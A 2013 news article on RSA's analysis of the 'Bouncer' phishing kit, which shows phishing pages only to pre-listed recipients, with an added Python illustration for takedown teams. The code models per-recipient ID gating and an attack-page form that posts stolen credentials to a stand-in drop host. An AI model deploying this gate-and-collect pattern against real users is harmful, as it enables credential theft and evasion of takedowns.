Bouncer Phishing Kit Limits Users

Thursday, January 17, 2013 @ 04:01 PM gHale

There is a new type of phishing kit that lets cybercriminals ensure only selected users can reach their phishing websites. Because only recipients on “the list” get in, the crime kit has earned the name “Bouncer.”

The Bouncer phishing kit relies on a preset list of email addresses. Each recipient receives a unique URL that carries a user ID value, said researchers at RSA.


Somewhat like targeted marketing, the kit only serves the people it was aimed at: when someone who is not on the list tries to access the phishing page, they end up redirected to a “404 page not found” page.

Some older phishing kits employ similar techniques, but they restrict access based on IP addresses, whereas Bouncer is a whitelist in black hat hands: only visitors presenting a pre-approved ID are served.

“When victims access the phishing link, their name has to be on the list and their ‘ID’ value is verified on-the-fly as soon as they attempt to browse to the URL. After a scan of the ‘bouncer list’, unintended visitors are steered away from the phishing page; in fact, the page is not even generated for eyes it was not meant for,” said RSA’s Limor Kessem.

Users who are allowed through get an attack page generated on the fly by the kit. The credentials they enter are sent to a different hijacked website, not to the site hosting the phishing page.

“Another thing that makes this different is that traditional phishers like to cast as wide of a net as possible, but with this tactic the phisher is laser-focusing the campaign in an effort to collect only the most pertinent credentials for his purposes. Keeping out uninvited guests also means avoiding security companies and prompt take-downs of such attacks,” Kessem added.
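The gating described above, as an added illustration that is not the kit's code or RSA's analysis: the ID carried in each recipient's unique URL is checked against the preset list before any page is rendered, and a responder-side probe shows why fetching the URL without the exact ID returns only a 404. The hostnames, the `id` parameter name, the HMAC-based ID derivation and the recipient list are all constructed for this example; the article does not say how the real kit derives its IDs.

```python
"""Constructed model of an ID-gated ("bouncer") phishing landing page.

Added example, not the kit's code. Hostnames, the ``id`` parameter name,
the HMAC-based ID derivation and the recipient list are all assumptions.
"""
import hashlib
import hmac
import urllib.parse
from typing import Dict, Tuple

# Constructed "list": the recipients the campaign was built for.
TARGET_EMAILS = ["alice@example.com", "bob@example.com", "carol@example.com"]

# Assumption: each ID is a keyed digest of the address, so an outsider cannot
# derive a valid ID from an email address alone.
CAMPAIGN_KEY = b"constructed-campaign-key"

LANDING_HOST = "hijacked-site.example"      # host serving the lure page
DROP_HOST = "second-hijacked-site.example"  # separate host receiving credentials
LANDING_PATH = "/account/verify"


def make_id(email: str) -> str:
    """Per-recipient ID value embedded in that recipient's unique URL."""
    digest = hmac.new(CAMPAIGN_KEY, email.lower().encode(), hashlib.sha256)
    return digest.hexdigest()[:16]


# The "bouncer list": ID -> recipient it was issued to.
BOUNCER_LIST: Dict[str, str] = {make_id(e): e for e in TARGET_EMAILS}


def campaign_url(email: str) -> str:
    """The unique URL mailed to one recipient."""
    return f"https://{LANDING_HOST}{LANDING_PATH}?id={make_id(email)}"


def render_attack_page(target_email: str) -> str:
    """Page generated only for a listed visitor; the form posts to a different host."""
    return (
        f'<form method="post" action="https://{DROP_HOST}/collect">'
        f'<input name="user" value="{target_email}">'
        '<input name="pass" type="password"></form>'
    )


def serve(url: str) -> Tuple[int, str]:
    """Gate: the ID is verified on the fly; unlisted visitors get a 404 and
    the attack page is never generated for them."""
    parts = urllib.parse.urlsplit(url)
    if parts.path != LANDING_PATH:
        return 404, "Not Found"
    visitor_id = urllib.parse.parse_qs(parts.query).get("id", [""])[0]
    target = BOUNCER_LIST.get(visitor_id)
    if target is None:
        return 404, "Not Found"
    return 200, render_attack_page(target)


def analyst_probe(reported_url: str) -> Dict[str, int]:
    """Responder check: replay the exact reported URL, the URL with the ID
    stripped, and the URL with a tampered ID, and compare status codes."""
    parts = urllib.parse.urlsplit(reported_url)
    reported_id = urllib.parse.parse_qs(parts.query).get("id", [""])[0]
    stripped = urllib.parse.urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))
    flipped = reported_id[:-1] + ("0" if reported_id[-1:] != "0" else "1")
    tampered = urllib.parse.urlunsplit(
        (parts.scheme, parts.netloc, parts.path, f"id={flipped}", "")
    )
    return {
        "exact": serve(reported_url)[0],
        "stripped": serve(stripped)[0],
        "tampered": serve(tampered)[0],
    }


if __name__ == "__main__":
    url = campaign_url("alice@example.com")
    print(url)
    print(analyst_probe(url))  # only the exact URL yields 200
```

The practical point for takedown and analysis teams is in `analyst_probe`: a URL copied from a user's report must be replayed byte-for-byte, ID included, from the reporting user's vantage point. Stripping the query string or normalizing the URL, as many scanners and sandboxes do, produces the same 404 an uninvited visitor sees and can make a live phishing page look already dead.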

The campaigns analyzed by RSA targeted, on average, about 3,000 recipients each. The targets appeared to be webmail users, corporate email recipients and even bank employees.

Experts warn these kits can be effective in spear phishing campaigns. The gating also has a practical consequence for responders: because the page is only generated for a visitor presenting a listed ID, an analyst who fetches the reported URL without the victim's exact ID value sees nothing but a 404.
